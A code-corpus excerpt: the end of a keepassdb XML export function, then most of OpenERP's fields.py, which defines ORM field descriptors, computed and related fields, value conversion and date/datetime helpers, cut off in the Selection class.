continue
enode = ET.SubElement(gnode, 'entry')
ET.SubElement(enode, 'title').text = entry.title
ET.SubElement(enode, 'username').text = entry.username
ET.SubElement(enode, 'password').text = entry.password
ET.SubElement(enode, 'url').text = entry.url
ET.SubElement(enode, 'comment').text = entry.notes
ET.SubElement(enode, 'icon').text = str(entry.icon)
ET.SubElement(enode, 'creation').text = _date(entry.created)
ET.SubElement(enode, 'lastaccess').text = _date(entry.accessed)
ET.SubElement(enode, 'lastmod').text = _date(entry.modified)
ET.SubElement(enode, 'expire').text = _date(entry.expires)
return gnode
for group in db.root.children:
dbnode.append(group_to_xml(group, dbnode))
xmlstr = ET.tostring(dbnode)
if self.prettyprint:
reparsed = minidom.parseString(xmlstr)
xmlstr = reparsed.toprettyxml(indent=" ")
        return xmlstr
 | hozn/keepassdb | keepassdb/export/xml.py | Python | gpl-3.0 | 3,206 | 0.005614 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" High-level objects for fields. """
from datetime import date, datetime
from functools import partial
from operator import attrgetter
from types import NoneType
import logging
import pytz
import xmlrpclib
from openerp.tools import float_round, ustr, html_sanitize
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT
DATE_LENGTH = len(date.today().strftime(DATE_FORMAT))
DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT))
_logger = logging.getLogger(__name__)
class SpecialValue(object):
""" Encapsulates a value in the cache in place of a normal value. """
def __init__(self, value):
self.value = value
def get(self):
return self.value
class FailedValue(SpecialValue):
""" Special value that encapsulates an exception instead of a value. """
def __init__(self, exception):
self.exception = exception
def get(self):
raise self.exception
def _check_value(value):
""" Return `value`, or call its getter if `value` is a :class:`SpecialValue`. """
return value.get() if isinstance(value, SpecialValue) else value
def resolve_all_mro(cls, name, reverse=False):
""" Return the (successively overridden) values of attribute `name` in `cls`
in mro order, or inverse mro order if `reverse` is true.
"""
klasses = reversed(cls.__mro__) if reverse else cls.__mro__
for klass in klasses:
if name in klass.__dict__:
yield klass.__dict__[name]
class MetaField(type):
""" Metaclass for field classes. """
by_type = {}
def __init__(cls, name, bases, attrs):
super(MetaField, cls).__init__(name, bases, attrs)
if cls.type:
cls.by_type[cls.type] = cls
# compute class attributes to avoid calling dir() on fields
cls.column_attrs = []
cls.related_attrs = []
cls.description_attrs = []
for attr in dir(cls):
if attr.startswith('_column_'):
cls.column_attrs.append((attr[8:], attr))
elif attr.startswith('_related_'):
cls.related_attrs.append((attr[9:], attr))
elif attr.startswith('_description_'):
cls.description_attrs.append((attr[13:], attr))
class Field(object):
""" The field descriptor contains the field definition, and manages accesses
and assignments of the corresponding field on records. The following
        attributes may be provided when instantiating a field:
:param string: the label of the field seen by users (string); if not
set, the ORM takes the field name in the class (capitalized).
:param help: the tooltip of the field seen by users (string)
:param readonly: whether the field is readonly (boolean, by default ``False``)
:param required: whether the value of the field is required (boolean, by
default ``False``)
:param index: whether the field is indexed in database (boolean, by
default ``False``)
:param default: the default value for the field; this is either a static
value, or a function taking a recordset and returning a value
:param states: a dictionary mapping state values to lists of UI attribute-value
pairs; possible attributes are: 'readonly', 'required', 'invisible'.
Note: Any state-based condition requires the ``state`` field value to be
available on the client-side UI. This is typically done by including it in
the relevant views, possibly made invisible if not relevant for the
end-user.
:param groups: comma-separated list of group xml ids (string); this
restricts the field access to the users of the given groups only
:param bool copy: whether the field value should be copied when the record
is duplicated (default: ``True`` for normal fields, ``False`` for
``one2many`` and computed fields, including property fields and
related fields)
:param string oldname: the previous name of this field, so that ORM can rename
it automatically at migration
.. _field-computed:
.. rubric:: Computed fields
One can define a field whose value is computed instead of simply being
read from the database. The attributes that are specific to computed
fields are given below. To define such a field, simply provide a value
for the attribute `compute`.
:param compute: name of a method that computes the field
:param inverse: name of a method that inverses the field (optional)
:param search: name of a method that implement search on the field (optional)
:param store: whether the field is stored in database (boolean, by
default ``False`` on computed fields)
The methods given for `compute`, `inverse` and `search` are model
methods. Their signature is shown in the following example::
upper = fields.Char(compute='_compute_upper',
inverse='_inverse_upper',
search='_search_upper')
@api.depends('name')
def _compute_upper(self):
for rec in self:
                rec.upper = rec.name.upper() if rec.name else False
def _inverse_upper(self):
for rec in self:
                rec.name = rec.upper.lower() if rec.upper else False
def _search_upper(self, operator, value):
if operator == 'like':
operator = 'ilike'
return [('name', operator, value)]
The compute method has to assign the field on all records of the invoked
recordset. The decorator :meth:`openerp.api.depends` must be applied on
the compute method to specify the field dependencies; those dependencies
are used to determine when to recompute the field; recomputation is
automatic and guarantees cache/database consistency. Note that the same
method can be used for several fields, you simply have to assign all the
given fields in the method; the method will be invoked once for all
those fields.
By default, a computed field is not stored to the database, and is
computed on-the-fly. Adding the attribute ``store=True`` will store the
field's values in the database. The advantage of a stored field is that
searching on that field is done by the database itself. The disadvantage
is that it requires database updates when the field must be recomputed.
The inverse method, as its name says, does the inverse of the compute
method: the invoked records have a value for the field, and you must
apply the necessary changes on the field dependencies such that the
computation gives the expected value. Note that a computed field without
an inverse method is readonly by default.
The search method is invoked when processing domains before doing an
actual search on the model. It must return a domain equivalent to the
condition: `field operator value`.
.. _field-related:
.. rubric:: Related fields
The value of a related field is given by following a sequence of
relational fields and reading a field on the reached model. The complete
sequence of fields to traverse is specified by the attribute
:param related: sequence of field names
Some field attributes are automatically copied from the source field if
they are not redefined: `string`, `help`, `readonly`, `required` (only
if all fields in the sequence are required), `groups`, `digits`, `size`,
`translate`, `sanitize`, `selection`, `comodel_name`, `domain`,
`context`. All semantic-free attributes are copied from the source
field.
By default, the values of related fields are not stored to the database.
Add the attribute ``store=True`` to make it stored, just like computed
fields. Related fields are automatically recomputed when their
dependencies are modified.
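        For example, exposing a partner's city on a model that has a
        ``partner_id`` field::
            partner_id = fields.Many2one('res.partner')
            partner_city = fields.Char(related='partner_id.city')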
.. _field-company-dependent:
.. rubric:: Company-dependent fields
Formerly known as 'property' fields, the value of those fields depends
on the company. In other words, users that belong to different companies
may see different values for the field on a given record.
:param company_dependent: whether the field is company-dependent (boolean)
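        For example (an illustrative field, not taken from a standard
        module)::
            standard_price = fields.Float(company_dependent=True)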
.. _field-incremental-definition:
.. rubric:: Incremental definition
A field is defined as class attribute on a model class. If the model
is extended (see :class:`~openerp.models.Model`), one can also extend
the field definition by redefining a field with the same name and same
type on the subclass. In that case, the attributes of the field are
taken from the parent class and overridden by the ones given in
subclasses.
For instance, the second class below only adds a tooltip on the field
``state``::
class First(models.Model):
_name = 'foo'
state = fields.Selection([...], required=True)
class Second(models.Model):
_inherit = 'foo'
state = fields.Selection(help="Blah blah blah")
"""
__metaclass__ = MetaField
_attrs = None # dictionary with all field attributes
_free_attrs = None # list of semantic-free attribute names
automatic = False # whether the field is automatically created ("magic" field)
inherited = False # whether the field is inherited (_inherits)
column = None # the column corresponding to the field
setup_done = False # whether the field has been set up
name = None # name of the field
type = None # type of the field (string)
relational = False # whether the field is a relational one
model_name = None # name of the model of this field
comodel_name = None # name of the model of values (if relational)
inverse_fields = None # list of inverse fields (objects)
store = True # whether the field is stored in database
index = False # whether the field is indexed in database
manual = False # whether the field is a custom field
copy = True # whether the field is copied over by BaseModel.copy()
depends = () # collection of field dependencies
recursive = False # whether self depends on itself
compute = None # compute(recs) computes field on recs
inverse = None # inverse(recs) inverses field on recs
search = None # search(recs, operator, value) searches on self
related = None # sequence of field names, for related fields
related_sudo = True # whether related fields should be read as admin
company_dependent = False # whether `self` is company-dependent (property field)
default = None # default(recs) returns the default value
string = None # field label
help = None # field tooltip
readonly = False
required = False
states = None
groups = False # csv list of group xml ids
change_default = None # whether the field may trigger a "user-onchange"
deprecated = None # whether the field is ... deprecated
def __init__(self, string=None, **kwargs):
kwargs['string'] = string
self._attrs = {key: val for key, val in kwargs.iteritems() if val is not None}
self._free_attrs = []
def new(self, **kwargs):
""" Return a field of the same type as `self`, with its own parameters. """
return type(self)(**kwargs)
def set_class_name(self, cls, name):
""" Assign the model class and field name of `self`. """
self.model_name = cls._name
self.name = name
# determine all inherited field attributes
attrs = {}
for field in resolve_all_mro(cls, name, reverse=True):
if isinstance(field, type(self)):
attrs.update(field._attrs)
else:
attrs.clear()
attrs.update(self._attrs) # necessary in case self is not in cls
# initialize `self` with `attrs`
if attrs.get('compute'):
# by default, computed fields are not stored, not copied and readonly
attrs['store'] = attrs.get('store', False)
attrs['copy'] = attrs.get('copy', False)
attrs['readonly'] = attrs.get('readonly', not attrs.get('inverse'))
if attrs.get('related'):
# by default, related fields are not stored
attrs['store'] = attrs.get('store', False)
# fix for function fields overridden by regular columns
if not isinstance(attrs.get('column'), (NoneType, fields.function)):
attrs.pop('store', None)
for attr, value in attrs.iteritems():
if not hasattr(self, attr):
self._free_attrs.append(attr)
setattr(self, attr, value)
if not self.string and not self.related:
# related fields get their string from their parent field
self.string = name.replace('_', ' ').capitalize()
# determine self.default and cls._defaults in a consistent way
self._determine_default(cls, name)
self.reset()
def _determine_default(self, cls, name):
""" Retrieve the default value for `self` in the hierarchy of `cls`, and
determine `self.default` and `cls._defaults` accordingly.
"""
self.default = None
# traverse the class hierarchy upwards, and take the first field
# definition with a default or _defaults for self
for klass in cls.__mro__:
if name in klass.__dict__:
field = klass.__dict__[name]
if not isinstance(field, type(self)):
# klass contains another value overridden by self
return
if 'default' in field._attrs:
# take the default in field, and adapt it for cls._defaults
value = field._attrs['default']
if callable(value):
from openerp import api
self.default = value
cls._defaults[name] = api.model(
lambda recs: self.convert_to_write(value(recs))
)
else:
self.default = lambda recs: value
cls._defaults[name] = value
return
defaults = klass.__dict__.get('_defaults') or {}
if name in defaults:
# take the value from _defaults, and adapt it for self.default
value = defaults[name]
if callable(value):
func = lambda recs: value(recs._model, recs._cr, recs._uid, recs._context)
else:
func = lambda recs: value
self.default = lambda recs: self.convert_to_cache(
func(recs), recs, validate=False,
)
cls._defaults[name] = value
return
def __str__(self):
return "%s.%s" % (self.model_name, self.name)
def __repr__(self):
return "%s.%s" % (self.model_name, self.name)
############################################################################
#
# Field setup
#
def reset(self):
""" Prepare `self` for a new setup. """
self.setup_done = False
# self._triggers is a set of pairs (field, path) that represents the
# computed fields that depend on `self`. When `self` is modified, it
# invalidates the cache of each `field`, and registers the records to
# recompute based on `path`. See method `modified` below for details.
self._triggers = set()
self.inverse_fields = []
def setup(self, env):
""" Complete the setup of `self` (dependencies, recomputation triggers,
and other properties). This method is idempotent: it has no effect
if `self` has already been set up.
"""
if not self.setup_done:
self._setup(env)
self.setup_done = True
def _setup(self, env):
""" Do the actual setup of `self`. """
if self.related:
self._setup_related(env)
else:
self._setup_regular(env)
# put invalidation/recomputation triggers on field dependencies
model = env[self.model_name]
for path in self.depends:
self._setup_dependency([], model, path.split('.'))
# put invalidation triggers on model dependencies
for dep_model_name, field_names in model._depends.iteritems():
dep_model = env[dep_model_name]
dep_model._setup_fields()
for field_name in field_names:
field = dep_model._fields[field_name]
field._triggers.add((self, None))
#
# Setup of related fields
#
def _setup_related(self, env):
""" Setup the attributes of a related field. """
# fix the type of self.related if necessary
if isinstance(self.related, basestring):
self.related = tuple(self.related.split('.'))
# determine the chain of fields, and make sure they are all set up
recs = env[self.model_name]
fields = []
for name in self.related:
recs._setup_fields()
field = recs._fields[name]
field.setup(env)
recs = recs[name]
fields.append(field)
self.related_field = field
# check type consistency
if self.type != field.type:
raise Warning("Type of related field %s is inconsistent with %s" % (self, field))
# determine dependencies, compute, inverse, and search
self.depends = ('.'.join(self.related),)
self.compute = self._compute_related
self.inverse = self._inverse_related
if field._description_searchable:
# allow searching on self only if the related field is searchable
self.search = self._search_related
# copy attributes from field to self (string, help, etc.)
for attr, prop in self.related_attrs:
if not getattr(self, attr):
setattr(self, attr, getattr(field, prop))
for attr in field._free_attrs:
if attr not in self._free_attrs:
self._free_attrs.append(attr)
setattr(self, attr, getattr(field, attr))
# special case for states: copy it only for inherited fields
if not self.states and self.inherited:
self.states = field.states
# special case for required: check if all fields are required
if not self.store and not self.required:
self.required = all(field.required for field in fields)
def _compute_related(self, records):
""" Compute the related field `self` on `records`. """
# when related_sudo, bypass access rights checks when reading values
others = records.sudo() if self.related_sudo else records
for record, other in zip(records, others):
if not record.id:
# draft record, do not switch to another environment
other = record
# traverse the intermediate fields; follow the first record at each step
for name in self.related[:-1]:
other = other[name][:1]
record[self.name] = other[self.related[-1]]
def _inverse_related(self, records):
""" Inverse the related field `self` on `records`. """
for record in records:
other = record
# traverse the intermediate fields, and keep at most one record
for name in self.related[:-1]:
other = other[name][:1]
if other:
other[self.related[-1]] = record[self.name]
def _search_related(self, records, operator, value):
""" Determine the domain to search on field `self`. """
return [('.'.join(self.related), operator, value)]
# properties used by _setup_related() to copy values from related field
_related_comodel_name = property(attrgetter('comodel_name'))
_related_string = property(attrgetter('string'))
_related_help = property(attrgetter('help'))
_related_readonly = property(attrgetter('readonly'))
_related_groups = property(attrgetter('groups'))
@property
def base_field(self):
""" Return the base field of an inherited field, or `self`. """
return self.related_field if self.inherited else self
#
# Setup of non-related fields
#
def _setup_regular(self, env):
""" Setup the attributes of a non-related field. """
recs = env[self.model_name]
def make_depends(deps):
return tuple(deps(recs) if callable(deps) else deps)
# convert compute into a callable and determine depends
if isinstance(self.compute, basestring):
# if the compute method has been overridden, concatenate all their _depends
self.depends = ()
for method in resolve_all_mro(type(recs), self.compute, reverse=True):
self.depends += make_depends(getattr(method, '_depends', ()))
self.compute = getattr(type(recs), self.compute)
else:
self.depends = make_depends(getattr(self.compute, '_depends', ()))
# convert inverse and search into callables
if isinstance(self.inverse, basestring):
self.inverse = getattr(type(recs), self.inverse)
if isinstance(self.search, basestring):
self.search = getattr(type(recs), self.search)
def _setup_dependency(self, path0, model, path1):
""" Make `self` depend on `model`; `path0 + path1` is a dependency of
`self`, and `path0` is the sequence of field names from `self.model`
to `model`.
"""
env = model.env
head, tail = path1[0], path1[1:]
model._setup_fields()
if head == '*':
# special case: add triggers on all fields of model (except self)
fields = set(model._fields.itervalues()) - set([self])
else:
fields = [model._fields[head]]
for field in fields:
if field == self:
_logger.debug("Field %s is recursively defined", self)
self.recursive = True
continue
field.setup(env)
#_logger.debug("Add trigger on %s to recompute %s", field, self)
field._triggers.add((self, '.'.join(path0 or ['id'])))
# add trigger on inverse fields, too
for invf in field.inverse_fields:
#_logger.debug("Add trigger on %s to recompute %s", invf, self)
invf._triggers.add((self, '.'.join(path0 + [head])))
# recursively traverse the dependency
if tail:
comodel = env[field.comodel_name]
self._setup_dependency(path0 + [head], comodel, tail)
@property
def dependents(self):
""" Return the computed fields that depend on `self`. """
return (field for field, path in self._triggers)
############################################################################
#
# Field description
#
def get_description(self, env):
""" Return a dictionary that describes the field `self`. """
desc = {'type': self.type}
for attr, prop in self.description_attrs:
value = getattr(self, prop)
if callable(value):
value = value(env)
if value is not None:
desc[attr] = value
return desc
# properties used by get_description()
_description_store = property(attrgetter('store'))
_description_manual = property(attrgetter('manual'))
_description_depends = property(attrgetter('depends'))
_description_related = property(attrgetter('related'))
_description_company_dependent = property(attrgetter('company_dependent'))
_description_readonly = property(attrgetter('readonly'))
_description_required = property(attrgetter('required'))
_description_states = property(attrgetter('states'))
_description_groups = property(attrgetter('groups'))
_description_change_default = property(attrgetter('change_default'))
_description_deprecated = property(attrgetter('deprecated'))
@property
def _description_searchable(self):
return bool(self.store or self.search or (self.column and self.column._fnct_search))
@property
def _description_sortable(self):
return self.store or (self.inherited and self.related_field._description_sortable)
def _description_string(self, env):
if self.string and env.lang:
field = self.base_field
name = "%s,%s" % (field.model_name, field.name)
trans = env['ir.translation']._get_source(name, 'field', env.lang)
return trans or self.string
return self.string
def _description_help(self, env):
if self.help and env.lang:
name = "%s,%s" % (self.model_name, self.name)
trans = env['ir.translation']._get_source(name, 'help', env.lang)
return trans or self.help
return self.help
############################################################################
#
# Conversion to column instance
#
def to_column(self):
""" return a low-level field object corresponding to `self` """
assert self.store or self.column
# determine column parameters
_logger.debug("Create fields._column for Field %s", self)
args = {}
for attr, prop in self.column_attrs:
args[attr] = getattr(self, prop)
for attr in self._free_attrs:
args[attr] = getattr(self, attr)
if self.company_dependent:
# company-dependent fields are mapped to former property fields
args['type'] = self.type
args['relation'] = self.comodel_name
self.column = fields.property(**args)
elif self.column:
# let the column provide a valid column for the given parameters
self.column = self.column.new(**args)
else:
# create a fresh new column of the right type
self.column = getattr(fields, self.type)(**args)
return self.column
# properties used by to_column() to create a column instance
_column_copy = property(attrgetter('copy'))
_column_select = property(attrgetter('index'))
_column_manual = property(attrgetter('manual'))
_column_string = property(attrgetter('string'))
_column_help = property(attrgetter('help'))
_column_readonly = property(attrgetter('readonly'))
_column_required = property(attrgetter('required'))
_column_states = property(attrgetter('states'))
_column_groups = property(attrgetter('groups'))
_column_change_default = property(attrgetter('change_default'))
_column_deprecated = property(attrgetter('deprecated'))
############################################################################
#
# Conversion of values
#
def null(self, env):
""" return the null value for this field in the given environment """
return False
def convert_to_cache(self, value, record, validate=True):
""" convert `value` to the cache level in `env`; `value` may come from
an assignment, or have the format of methods :meth:`BaseModel.read`
or :meth:`BaseModel.write`
:param record: the target record for the assignment, or an empty recordset
:param bool validate: when True, field-specific validation of
`value` will be performed
"""
return value
def convert_to_read(self, value, use_name_get=True):
""" convert `value` from the cache to a value as returned by method
:meth:`BaseModel.read`
        :param bool use_name_get: when True, value's display name will
be computed using :meth:`BaseModel.name_get`, if relevant
for the field
"""
return False if value is None else value
def convert_to_write(self, value, target=None, fnames=None):
""" convert `value` from the cache to a valid value for method
:meth:`BaseModel.write`.
:param target: optional, the record to be modified with this value
:param fnames: for relational fields only, an optional collection of
field names to convert
"""
return self.convert_to_read(value)
def convert_to_onchange(self, value):
""" convert `value` from the cache to a valid value for an onchange
method v7.
"""
return self.convert_to_write(value)
def convert_to_export(self, value, env):
""" convert `value` from the cache to a valid value for export. The
parameter `env` is given for managing translations.
"""
if env.context.get('export_raw_data'):
return value
return bool(value) and ustr(value)
def convert_to_display_name(self, value):
""" convert `value` from the cache to a suitable display name. """
return ustr(value)
############################################################################
#
# Descriptor methods
#
def __get__(self, record, owner):
""" return the value of field `self` on `record` """
if record is None:
return self # the field is accessed through the owner class
if not record:
# null record -> return the null value for this field
return self.null(record.env)
# only a single record may be accessed
record.ensure_one()
try:
return record._cache[self]
except KeyError:
pass
# cache miss, retrieve value
if record.id:
# normal record -> read or compute value for this field
self.determine_value(record)
else:
# draft record -> compute the value or let it be null
self.determine_draft_value(record)
# the result should be in cache now
return record._cache[self]
def __set__(self, record, value):
""" set the value of field `self` on `record` """
env = record.env
# only a single record may be updated
record.ensure_one()
# adapt value to the cache level
value = self.convert_to_cache(value, record)
if env.in_draft or not record.id:
# determine dependent fields
spec = self.modified_draft(record)
# set value in cache, inverse field, and mark record as dirty
record._cache[self] = value
if env.in_onchange:
for invf in self.inverse_fields:
invf._update(value, record)
record._set_dirty(self.name)
# determine more dependent fields, and invalidate them
if self.relational:
spec += self.modified_draft(record)
env.invalidate(spec)
else:
# simply write to the database, and update cache
record.write({self.name: self.convert_to_write(value)})
record._cache[self] = value
############################################################################
#
# Computation of field values
#
def _compute_value(self, records):
""" Invoke the compute method on `records`. """
# initialize the fields to their corresponding null value in cache
for field in self.computed_fields:
records._cache[field] = field.null(records.env)
records.env.computed[field].update(records._ids)
self.compute(records)
for field in self.computed_fields:
records.env.computed[field].difference_update(records._ids)
def compute_value(self, records):
""" Invoke the compute method on `records`; the results are in cache. """
with records.env.do_in_draft():
try:
self._compute_value(records)
except (AccessError, MissingError):
# some record is forbidden or missing, retry record by record
for record in records:
try:
self._compute_value(record)
except Exception as exc:
record._cache[self.name] = FailedValue(exc)
def determine_value(self, record):
""" Determine the value of `self` for `record`. """
env = record.env
if self.column and not (self.depends and env.in_draft):
# this is a stored field or an old-style function field
if self.depends:
# this is a stored computed field, check for recomputation
recs = record._recompute_check(self)
if recs:
# recompute the value (only in cache)
self.compute_value(recs)
# HACK: if result is in the wrong cache, copy values
if recs.env != env:
for source, target in zip(recs, recs.with_env(env)):
try:
values = target._convert_to_cache({
f.name: source[f.name] for f in self.computed_fields
}, validate=False)
except MissingError as e:
values = FailedValue(e)
target._cache.update(values)
# the result is saved to database by BaseModel.recompute()
return
# read the field from database
record._prefetch_field(self)
elif self.compute:
# this is either a non-stored computed field, or a stored computed
# field in draft mode
if self.recursive:
self.compute_value(record)
else:
recs = record._in_cache_without(self)
self.compute_value(recs)
else:
# this is a non-stored non-computed field
record._cache[self] = self.null(env)
def determine_draft_value(self, record):
""" Determine the value of `self` for the given draft `record`. """
if self.compute:
self._compute_value(record)
else:
record._cache[self] = SpecialValue(self.null(record.env))
def determine_inverse(self, records):
""" Given the value of `self` on `records`, inverse the computation. """
if self.inverse:
self.inverse(records)
def determine_domain(self, records, operator, value):
""" Return a domain representing a condition on `self`. """
if self.search:
return self.search(records, operator, value)
else:
return [(self.name, operator, value)]
############################################################################
#
# Notification when fields are modified
#
def modified(self, records):
""" Notify that field `self` has been modified on `records`: prepare the
fields/records to recompute, and return a spec indicating what to
invalidate.
"""
# invalidate the fields that depend on self, and prepare recomputation
spec = [(self, records._ids)]
for field, path in self._triggers:
if path and field.store:
# don't move this line to function top, see log
env = records.env(user=SUPERUSER_ID, context={'active_test': False})
target = env[field.model_name].search([(path, 'in', records.ids)])
if target:
spec.append((field, target._ids))
target.with_env(records.env)._recompute_todo(field)
else:
spec.append((field, None))
return spec
def modified_draft(self, records):
""" Same as :meth:`modified`, but in draft mode. """
env = records.env
# invalidate the fields on the records in cache that depend on
# `records`, except fields currently being computed
spec = []
for field, path in self._triggers:
target = env[field.model_name]
computed = target.browse(env.computed[field])
if path == 'id':
target = records - computed
elif path:
target = (target.browse(env.cache[field]) - computed).filtered(
lambda rec: rec._mapped_cache(path) & records
)
else:
target = target.browse(env.cache[field]) - computed
if target:
spec.append((field, target._ids))
return spec
class Boolean(Field):
type = 'boolean'
def convert_to_cache(self, value, record, validate=True):
return bool(value)
def convert_to_export(self, value, env):
if env.context.get('export_raw_data'):
return value
return ustr(value)
class Integer(Field):
type = 'integer'
group_operator = None # operator for aggregating values
_related_group_operator = property(attrgetter('group_operator'))
_column_group_operator = property(attrgetter('group_operator'))
def convert_to_cache(self, value, record, validate=True):
if isinstance(value, dict):
# special case, when an integer field is used as inverse for a one2many
return value.get('id', False)
return int(value or 0)
def convert_to_read(self, value, use_name_get=True):
# Integer values greater than 2^31-1 are not supported in pure XMLRPC,
# so we have to pass them as floats :-(
if value and value > xmlrpclib.MAXINT:
return float(value)
return value
def _update(self, records, value):
# special case, when an integer field is used as inverse for a one2many
records._cache[self] = value.id or 0
class Float(Field):
""" The precision digits are given by the attribute
:param digits: a pair (total, decimal), or a function taking a database
cursor and returning a pair (total, decimal)
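        For example::
            amount = fields.Float(digits=(16, 2))  # 16 total digits, 2 decimal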
"""
type = 'float'
_digits = None # digits argument passed to class initializer
digits = None # digits as computed by setup()
group_operator = None # operator for aggregating values
def __init__(self, string=None, digits=None, **kwargs):
super(Float, self).__init__(string=string, _digits=digits, **kwargs)
def _setup_digits(self, env):
""" Setup the digits for `self` and its corresponding column """
self.digits = self._digits(env.cr) if callable(self._digits) else self._digits
if self.digits:
assert isinstance(self.digits, (tuple, list)) and len(self.digits) >= 2, \
"Float field %s with digits %r, expecting (total, decimal)" % (self, self.digits)
if self.column:
self.column.digits_change(env.cr)
def _setup_regular(self, env):
super(Float, self)._setup_regular(env)
self._setup_digits(env)
_related_digits = property(attrgetter('digits'))
_related_group_operator = property(attrgetter('group_operator'))
_description_digits = property(attrgetter('digits'))
_column_digits = property(lambda self: not callable(self._digits) and self._digits)
_column_digits_compute = property(lambda self: callable(self._digits) and self._digits)
_column_group_operator = property(attrgetter('group_operator'))
def convert_to_cache(self, value, record, validate=True):
# apply rounding here, otherwise value in cache may be wrong!
if self.digits:
return float_round(float(value or 0.0), precision_digits=self.digits[1])
else:
return float(value or 0.0)
class _String(Field):
""" Abstract class for string fields. """
translate = False
_column_translate = property(attrgetter('translate'))
_related_translate = property(attrgetter('translate'))
_description_translate = property(attrgetter('translate'))
class Char(_String):
""" Basic string field, can be length-limited, usually displayed as a
single-line string in clients
:param int size: the maximum size of values stored for that field
:param bool translate: whether the values of this field can be translated
"""
type = 'char'
size = None
def _setup(self, env):
super(Char, self)._setup(env)
assert isinstance(self.size, (NoneType, int)), \
"Char field %s with non-integer size %r" % (self, self.size)
_column_size = property(attrgetter('size'))
_related_size = property(attrgetter('size'))
_description_size = property(attrgetter('size'))
def convert_to_cache(self, value, record, validate=True):
if value is None or value is False:
return False
return ustr(value)[:self.size]
class Text(_String):
""" Very similar to :class:`~.Char` but used for longer contents, does not
have a size and usually displayed as a multiline text box.
:param translate: whether the value of this field can be translated
"""
type = 'text'
def convert_to_cache(self, value, record, validate=True):
if value is None or value is False:
return False
return ustr(value)
class Html(_String):
type = 'html'
sanitize = True # whether value must be sanitized
_column_sanitize = property(attrgetter('sanitize'))
_related_sanitize = property(attrgetter('sanitize'))
_description_sanitize = property(attrgetter('sanitize'))
def convert_to_cache(self, value, record, validate=True):
if value is None or value is False:
return False
if validate and self.sanitize:
return html_sanitize(value)
return value
class Date(Field):
type = 'date'
@staticmethod
def today(*args):
""" Return the current day in the format expected by the ORM.
This function may be used to compute default values.
"""
return date.today().strftime(DATE_FORMAT)
@staticmethod
def context_today(record, timestamp=None):
""" Return the current date as seen in the client's timezone in a format
fit for date fields. This method may be used to compute default
values.
:param datetime timestamp: optional datetime value to use instead of
the current date and time (must be a datetime, regular dates
can't be converted between timezones.)
:rtype: str
"""
today = timestamp or datetime.now()
context_today = None
tz_name = record._context.get('tz') or record.env.user.tz
if tz_name:
try:
today_utc = pytz.timezone('UTC').localize(today, is_dst=False) # UTC = no DST
context_today = today_utc.astimezone(pytz.timezone(tz_name))
except Exception:
_logger.debug("failed to compute context/client-specific today date, using UTC value for `today`",
exc_info=True)
return (context_today or today).strftime(DATE_FORMAT)
@staticmethod
def from_string(value):
""" Convert an ORM `value` into a :class:`date` value. """
value = value[:DATE_LENGTH]
return datetime.strptime(value, DATE_FORMAT).date()
@staticmethod
def to_string(value):
""" Convert a :class:`date` value into the format expected by the ORM. """
return value.strftime(DATE_FORMAT)
def convert_to_cache(self, value, record, validate=True):
if not value:
return False
if isinstance(value, basestring):
if validate:
# force parsing for validation
self.from_string(value)
return value[:DATE_LENGTH]
return self.to_string(value)
def convert_to_export(self, value, env):
if value and env.context.get('export_raw_data'):
return self.from_string(value)
return bool(value) and ustr(value)
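# Illustrative round trip, assuming the standard '%Y-%m-%d' ORM date format:
# Date.from_string('2015-06-01') # -> datetime.date(2015, 6, 1)
# Date.to_string(date(2015, 6, 1)) # -> '2015-06-01'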
class Datetime(Field):
type = 'datetime'
@staticmethod
def now(*args):
""" Return the current day and time in the format expected by the ORM.
This function may be used to compute default values.
"""
return datetime.now().strftime(DATETIME_FORMAT)
@staticmethod
def context_timestamp(record, timestamp):
"""Returns the given timestamp converted to the client's timezone.
This method is *not* meant for use as a _defaults initializer,
because datetime fields are automatically converted upon
display on client side. For _defaults, :meth:`fields.Datetime.now`
should be used instead.
:param datetime timestamp: naive datetime value (expressed in UTC)
to be converted to the client timezone
:rtype: datetime
:return: timestamp converted to timezone-aware datetime in context
timezone
"""
assert isinstance(timestamp, datetime), 'Datetime instance expected'
tz_name = record._context.get('tz') or record.env.user.tz
if tz_name:
try:
utc = pytz.timezone('UTC')
context_tz = pytz.timezone(tz_name)
utc_timestamp = utc.localize(timestamp, is_dst=False) # UTC = no DST
return utc_timestamp.astimezone(context_tz)
except Exception:
_logger.debug("failed to compute context/client-specific timestamp, "
"using the UTC value",
exc_info=True)
return timestamp
@staticmethod
def from_string(value):
""" Convert an ORM `value` into a :class:`datetime` value. """
value = value[:DATETIME_LENGTH]
if len(value) == DATE_LENGTH:
value += " 00:00:00"
return datetime.strptime(value, DATETIME_FORMAT)
@staticmethod
def to_string(value):
""" Convert a :class:`datetime` value into the format expected by the ORM. """
return value.strftime(DATETIME_FORMAT)
def convert_to_cache(self, value, record, validate=True):
if not value:
return False
if isinstance(value, basestring):
if validate:
# force parsing for validation
self.from_string(value)
value = value[:DATETIME_LENGTH]
if len(value) == DATE_LENGTH:
value += " 00:00:00"
return value
return self.to_string(value)
def convert_to_export(self, value, env):
if value and env.context.get('export_raw_data'):
return self.from_string(value)
return bool(value) and ustr(value)
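# Illustrative use of context_timestamp (assumes the user's timezone is
# 'Europe/Brussels', UTC+2 in summer):
# naive_utc = Datetime.from_string('2015-06-01 12:00:00')
# Datetime.context_timestamp(record, naive_utc) # -> 14:00, tz-aware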
class Binary(Field):
type = 'binary'
class Selection(Field):
"""
:param selection: specifies the possible values for this field.
It is given as either a list of pairs (`value`, `string`), or a
model method, or a method name.
:param selection_add: provides an extension of the selection in the case
of an overridden field. It is a list of pairs (`value`, `string`).
The attribute `selection` is mandatory except in the case of
:ref:`related fields <field-related>` or :ref:`field extensions
<field-incremental-definition>`.
"""
type = 'selection'
selection = None # [(value, string), ...], function or method name
selection_add = None # [(value, string), ...]
def __init__(self, selection=None, string=None, **kwargs):
if callable(selection):
from openerp import api
